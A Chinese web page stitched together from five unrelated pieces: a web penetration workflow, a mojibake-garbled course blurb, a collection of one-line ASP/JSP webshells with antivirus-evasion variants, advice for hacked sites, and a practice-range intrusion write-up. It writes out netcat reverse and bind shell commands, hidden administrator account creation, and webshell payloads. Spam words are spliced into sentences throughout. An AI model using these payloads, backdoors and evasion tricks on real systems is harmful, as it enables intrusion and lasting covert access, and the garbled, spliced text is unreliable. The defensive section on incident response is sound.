1.web渗透是渗透渗透什么?
2.ç½ç»å®å
¨å¹è®å
容
3.渗透干货|史上最全一句话木马
4.网站被黑客攻击怎么办
5.暗月内网靶场渗透笔记
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是源码指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。网站而黑盒测试则是渗透渗透在对该网站系统信息不知情的情况下渗透,以下所说的源码Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,网站网站源码作用信息收集,渗透渗透漏洞扫描,源码漏洞利用,网站提权,渗透渗透内网渗透,源码留后门,网站清理痕迹。渗透渗透一般的源码渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,网站登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,404资金分析源码清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,诛仙 au源码dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp
在内网主机上执行:
nc-e cmd.exe 公网主机ip
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
ç½ç»å®å ¨å¹è®å 容
çå¿ç¸å©
æ¨å¥½ï¼ç½ç»å®å ¨å®ç¨ææ¯çåºæ¬ç¥è¯ï¼ç½ç»å®å ¨ä½ç³»ç»æãæ 线ç½åèæä¸ç¨ç½å®å ¨ç®¡çãIPv6å®å ¨æ§ï¼ç½ç»å®å ¨çè§åãæµè¯ä¸è§èãæ³å¾æ³è§ãä½ç³»ä¸çç¥ã管çååä¸å¶åº¦ï¼é»å®¢çæ»é²ä¸å ¥ä¾µæ£æµï¼èº«ä»½è®¤è¯ä¸è®¿é®æ§å¶ï¼å¯ç ä¸å å¯ç®¡çï¼ç æ¯åæ¶æ软件é²æ¤ï¼é²ç«å¢å®å ¨ç®¡çï¼æä½ç³»ç»ä¸ç«ç¹å®å ¨ç®¡çãæ°æ®ä¸æ°æ®åºå®å ¨ç®¡çï¼çµååå¡ç½ç«å®å ¨ç®¡çååºç¨ï¼ç½ç»å®å ¨ç®¡ç解å³æ¹æ¡çãå æ¬âæ»ï¼æ»å»ï¼ãé²ï¼é²èï¼ãæµï¼æ£æµï¼ãæ§ï¼æ§å¶ï¼ã管ï¼ç®¡çï¼ãè¯ï¼è¯ä¼°ï¼âçå¤æ¹é¢çåºç¡ç论åææ¯åºç¨ãæ¨èï¼ç½ç»å®å ¨å®ç¨ææ¯ï¼æ¸ å大å¦åºç社ï¼è´¾éåææ主ç¼ï¼å«åæ¥å®éªï¼ä¸æµ·å¸éç¹è¯¾ç¨èµæºç½ç«/G2S/Template/View.aspx?action=view&courseType=0&courseId=
渗透干货|史上最全一句话木马
史上最全一句话木马的渗透技巧汇总:
PHP中,一句可执行命令的代码示例://可执行命令一句话,其中过狗版本(phpv9)可用于获取shell权限。ASP同样支持,如asp 一句话,但ASPX版本的效果不如ASP,尽管大部分情况支持,macd数字指标源码如aspx 百分之8/支持asp。
JSP中,过护卫神的代码是:<%E=request(“1”)%>abc,通过修改标签以避开敏感符号,如execute request(“cmd”),以应对数据段限制。
针对数据库限制,可以将木马分成两部分提交,如<%Y=request(“x”)%> <%execute(Y)%>。但需注意ACCESS数据库的插入顺序,以及可能的错误处理。
一句话木马进化到两句话木马,如在服务端原型<%execute request(“value”)%>的基础上添加错误处理,以提高隐蔽性。通过外部文件调用和文件变形可实现免杀,如使用execute(request("#"))的变形。
在WEBSHELL中,通过上传CMD.exe并修改调用代码来使用命令提示,如.exec(“D:\web\www\cmd.exe /c”&DefCmd).stdout.readall。
尽管看起来已不再是"一句话",但通过精心设计,这些技巧依然保持高隐藏性和免杀性,适合在未禁用POST时使用。
网站被黑客攻击怎么办
网站上面有很多吸引我们的key ip定位源码地方,但是网站上面也埋伏着黑客的身影,那网站被黑客攻击怎么办了解网络安全常识,首先就要了解常见电脑黑客攻击类型与预防方
法,下面裕祥安全网
小编就带您认识一下吧。
方法
1、确认被攻击的范围网站被篡改,可能攻击都只有网站的权限就是常说的Webshell,也有可能攻击者通过Webshell提权,已经获取到服务器的权限,甚至已经渗透到内网。所以你通过日志等迹象来判断和确认攻击的范围。
2、备份日志备份日志(如IIS、apache、FTP、Windows/Linux/Unix等日志)。也许部份日志已经被黑客清除,可以通过日志恢复等方法,尽量找到更多的日志。如果有大的损失,完全可以报警,这时候日志就发挥重要作用了,办案人员可以通过日志寻找入侵者的行踪。日志还有一个重要作用就是或许可以找到黑客攻击该网站时使用的方法,并从中寻找漏洞所在。
3、清除后门程序一般黑客会为了长期巩固“成果”,会安装各种后门程序如asp、aspx、php、jsp、cgi、py等脚本木马。如果黑客已经获取到服务器权限,那么你就检查基于系统的后门如Rootkit、反弹远程控制木马,检查黑客是否替换程序、克隆管理员账号等。
4、修复漏洞仅仅清除后门是不够的,必须找到漏洞所在,这才是从根本上解决安全问题,这个过程难度是最高的,一般会涉及到开发,需要具有丰富经验的安全人员才能解决。
5、更改原来配置修复漏洞后,我们需要更改一些以前的配置文件,如网站后台密码、数据库连接密码、如果是ACCESS、ASA等格式数据库需要变更路径或者文件名,这样的目的就是防止黑客通过以前的记录信息,再次入侵,同时更改Administrator、Root等管理员密码。
网站防黑建议
1、渗透性测试如果有条件可以聘请安全人员进行渗透性测试,或者聘请专业的安全人员维护。
提示:渗透性测试是经过授权后,安全人员模拟黑客攻击,来寻找网络、服务器、网站的脆弱点和漏洞,并且给予相应的安全解决方案。
2、加强安全意识假若有层层的安全设备保护网站,并且网站源码通过专业的安全审计,如果网站后台密码或者FTP口令设置成,那么再好的防护也是没有用的。
关于网络安全小知识
,小编为您介绍和普及这么多了,看完上面的介绍,您对“网站被黑客攻击怎么办”这个问题了解多少了呢为了保证我们的正常生活,我们在上网的时候还是尽量远离一些不正常的网站,以免被黑客钓鱼进行攻击。
暗月内网靶场渗透笔记
在暗月靶场渗透测试中,首要步骤是下载靶场的虚拟机并进行网络设置。使用拓扑图了解靶场结构。随后,通过本地内网扫描定位目标靶机。由于靶机上安装有和各种安全软件,使用masscan进行端口扫描,再用nmap获取详细信息。
识别到靶机开放了6个端口,开始利用nmap详细检查。尝试访问web页面,使用本地DNS解析域名,然后访问域名。由于网站上设有waf,即便尝试目录fuzz,仍返回状态码。因此,采用自定义的python脚本来爆破目录。发现特定目录大小不一致,直接访问后发现是robots.txt文件,为搜索引擎抓取规则。
渗透测试中,遇到登录页面时,利用逻辑漏洞尝试破解。输入“admin”作为用户名,随意输入答案,利用Burp Suite追踪包信息,将答案参数置为空,重新发送请求。页面显示密码,说明验证逻辑存在问题,成功登录后台。进入后台后,发现可以上传文件,选择模板管理修改网站文件,利用冰蝎自带的aspx一句话木马插入,保存并访问文件,成功建立msf反弹shell。
获取当前用户权限,使用msfveno工具生成免杀木马,将shell上传至目标主机,通过哥斯拉连接执行木马,成功获得shell。迁移进程至稳定程序,导出密码,使用远程桌面连接获取最终主机。在cs中设置监听器,生成木马并上传,执行后获得会话,浏览文件发现另一域用户,查看当前主机域名及域控登录信息,识别最终目标主机。
利用爆破工具获取域用户密码,进入msf修改密码,开启..1.主机的端口,使用第一台主机远程桌面连接,输入域用户信息及密码,成功登录,最终获取flag。